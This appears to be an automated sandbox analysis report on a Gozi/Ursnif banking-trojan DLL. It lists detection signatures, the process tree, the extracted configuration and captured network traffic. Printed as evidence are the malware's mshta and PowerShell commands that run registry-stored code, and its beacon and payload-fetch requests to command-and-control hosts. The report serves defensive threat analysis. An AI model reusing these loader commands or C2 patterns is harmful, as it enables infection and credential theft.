Loading ...

Play interactive tourEdit tour

Analysis Report fo.dll

Overview

General Information

Sample Name:fo.dll
Analysis ID:334007
MD5:b72c009b01b9321cbcb327cf285ccef7
SHA1:8599a832cdc973e8949a631c349980c0f41ffc48
SHA256:edf82bc9c74787acbae4fc2a22aa35646616d23b781d6a75a7799a25431398c6

Most interesting Screenshot:

Detection

Gozi Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6736 cmdline: loaddll32.exe 'C:\Users\user\Desktop\fo.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • control.exe (PID: 4544 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 4000 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • iexplore.exe (PID: 6616 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5076 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 4652 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:82954 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6188 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5680 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5276 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5760 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6756 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8A0A.tmp' 'c:\Users\user\AppData\Local\Temp\b5r2gs3w\CSCC26898CFCBA4739B5B18589DB58EA5A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 4580 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1dcawf3x\1dcawf3x.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3820 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES97F5.tmp' 'c:\Users\user\AppData\Local\Temp\1dcawf3x\CSCA42BA027116C433D856471BB95F3A1F.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "134", "system": "9c06dc0837d13fc92eb590af08acbac4hhE", "size": "201283", "crc": "2", "action": "00000000", "id": "3300", "time": "1608869150", "user": "f73be0088695dc15e71ab15c41fb0bc7", "hash": "0x0acc6525", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.288648996.0000000004068000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.288684666.0000000004068000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmpGoziRuleWin32.GoziCCN-CERT
        • 0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
        00000000.00000003.288770210.0000000004068000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          Click to see the 29 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5276, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', ProcessId: 5760
          Sigma detected: MSHTA Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5680, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5276
          Sigma detected: Suspicious Csc.exe Source File FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5276, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\b5r2gs3w\b5r2gs3w.cmdline', ProcessId: 5760
          Sigma detected: Suspicious Rundll32 ActivityShow sources
          Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4544, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 4000

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: loaddll32.exe.6736.0.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "134", "system": "9c06dc0837d13fc92eb590af08acbac4hhE", "size": "201283", "crc": "2", "action": "00000000", "id": "3300", "time": "1608869150", "user": "f73be0088695dc15e71ab15c41fb0bc7", "hash": "0x0acc6525", "soft": "3"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: fo.dllVirustotal: Detection: 22%Perma Link
          Machine Learning detection for sampleShow sources
          Source: fo.dllJoe Sandbox ML: detected
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_03144FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_03144FE1
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0313888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_0313888D
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0312E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_0312E0BA
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_031305EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_031305EF
          Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
          Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
          Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft
          Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local

          Networking:

          barindex
          Creates a COM Internet Explorer objectShow sources
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/JqcXh8pdjCRNE_2Bo/k4G_2BpM24Ua/kAoQCjr_2Bh/ujHmQfZGFu_2F2/nA1tAcoG0UwmK9lArxe1S/414MI2ZuaHyc3Hql/pDoGm3pbqcfZ6eH/rIV_2B_2BIwZsV3ugj/LFW12XoXB/5IhYMecPu_2FZ3MO7ToD/UbND3bAbyICPq0DkfXa/IBZ9XP6woLvZlIKyAfQqqI/Uiw5lx_2FvlxN/HMlCb4bo/g8XoEKflv1sBuQnXNE8yNcw/AKDCMRNxF4/MMEe64x10s46GwvXs/NfWSVoItfJCu/ETw0UJmfuPx/MFmlVBYs8cT1cy/upat0gwv0SID/c HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/MC0KUFyM/atN4YRJ4eGaVNgoEiHKk1sV/uZXY8dNFOC/5muSX5_2FgYBcb3Z0/Hw8SCE4gdadK/LoRPjWZ1kN2/o8CoNlrTCVbhEo/361jZbmCNrUZVIP5Bhl57/JqyEcDfYivA3dm0O/mky8dRn0ggErrbj/akiw2jijXQRCdNJW8y/iVMNh7InN/9CHIQJtXSEecSzTxafOp/CndbtrwZnb3pGjztd1x/sNuKRnkS3EeHF4W3Svpatj/SuzQoCnLkNFM_/2F9afglr/8gsSDsY68lq9DByv2oLPokh/wgO8nuXPE5/2ZEgLGQD8YpRYIz5b/FeDsfcnAti/dh68UKBF HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: golang.feel500.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/T71KVycXOQruF4f/s6NxfSxO4aOvwuDAhc/xYqC7FzXs/VyqbkY4JBrOhqczKNK_2/FCqi0ui4EgRuQKNmSc2/LHtuPWymhOYZR_2FJDHmxn/_2FrEGE1ZbjAn/1oshEbf_/2FLREWh1LoDUsvxxAvs7QD5/dvnwj8fGqM/x9Cj0InfA93JERgMb/jvGKQ1lz4X9T/7v88BZtQprh/toDQVprzBnQqX7/PNo9bxVHknk7UTjGk71xL/qaOfpUOtZr60DaIJ/Z_2BfcJhSJDle0W/SRI_2FrQNsALZHaCkM/LU1KC3iGK/DvkQcZrlaQKckhwbDOmn/rYJqFe6wJntn8_2FTVZ/m40BS HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/LORfTl2pETMFVU7/wmWsrPQkTKd_2FnRRq/YFsoOxoi6/ZKKr_2BSzTM1ZV_2BmG8/QLf1_2BrD7d9qUhAxps/CGbKC7bT1amoQI1HYUX8R7/wm75uPSfo_2B2/_2FsJFS6/_2BNeXTDBj_2BtQXfJjgc3I/HnVW2zL6rr/joxJeMAoMMP9c2fI0/tMrDLqA_2FiO/Fpvbtyr_2B1/MuEXGCiN9n5YUz/PA_2F9ti0coaJgd_2BIiz/xE1X7ankHr3ko40c/dbREH_2BlZg_2F_/2FFd2SKEDVXMlYpxRv/xrEPDyAVN/y0vUiofeSrtYGhvW4XLQ/LX_2FjAdqFE0fVpb5Hc/94ExhbjQdDmIQdq_2F2tMR/azR HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/ge76nNd2r9i7q/f4m7qnru/ODJiitx5KnO_2FlTKPLiqHN/iN3_2FwnGS/cMz53x6_2BNTJzFKu/GvXWghhznGvj/xuyrdDzhJ8U/ipLoAih5yQdyhW/jYxcE7DfgVGYeA0ymDNSv/2cXxlL4sP4_2B7dE/KscxdpWWxM653_2/B_2Fz0kRfaWcJF5wq8/85RpQlZKe/V8jy_2BSqfOrqvaSuZRQ/jK1M36Z4E2lD5gJWX4u/PXlLACwNTib8qbZUXKDq1s/5q3wJc33iTaAL/UKszY336/PyF_2B_2Fxuh9RQFy7nHHpu/xcXSzckdW9/8jC6GzIl/MxkKpsQ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/ZlBWB39wHAVH3v/raQmqMGJOifuhaYaKNwxh/IZ_2F6KBArqyCY8b/WbnoycUqXeSUGG9/rcgEljM3y6DLL_2BQV/3c03FGZDQ/pExrtqt50dAd2zPnzL3m/bLVeszfj3J1PKvuTYR5/m2X2vt_2FBD8yHfErKPH45/2RSHFXzCtabu7/yWSpuChs/EzLl2UBJPJU_2BdHaDjN7Dw/524FGLWh_2/BjCBxT8fanf_2FJBl/OiuE4QhSNb2G/hMldz29diPw/4FF40uXsQWZKGL/IAMRrIyJs6o_2BVOaFkq9/SCNXTFsH5uVIx_2F/49xRCH3m7bermao/j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmpString found in binary or memory: FIND US: www.facebook.com/HiddenCityGame equals www.facebook.com (Facebook)
          Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmpString found in binary or memory: FOLLOW US: www.twitter.com/g5games equals www.twitter.com (Twitter)
          Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmpString found in binary or memory: WATCH US: www.youtube.com/g5enter equals www.youtube.com (Youtube)
          Source: unknownDNS traffic detected: queries for: golang.feel500.at
          Source: unknownHTTP traffic detected: POST /api1/GC1ocAtBhowKLdLbTST8/6YRfIHrc1z8aNndqDwy/Rj4cR0tkeWtB5SXs0_2FDA/G_2Bzob9KrYk1/ee238C3Z/JDlyapWA93gE3_2Bp1jTydd/8GEbA8iZ06/e4a5NG_2FcTR_2FK1/ZUyu2uSSJ9F9/DomsqAwIwqE/YoT6M9Yf8a3aZq/kF6U6bm3L2d8juuElHvFK/nLA9fg_2BF9F7d1o/_2FXLVqgOXpmlhi/xiQPBRQ00LlJWSjfVm/ktN1zwUZ8/1L3Jodx29tHs_2FY7FjX/MxbpxkWX3VN69cbK6kU/aqmaWa1G2QstKbyN7jrfLu/a1Wmfh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Dec 2020 19:05:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
          Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
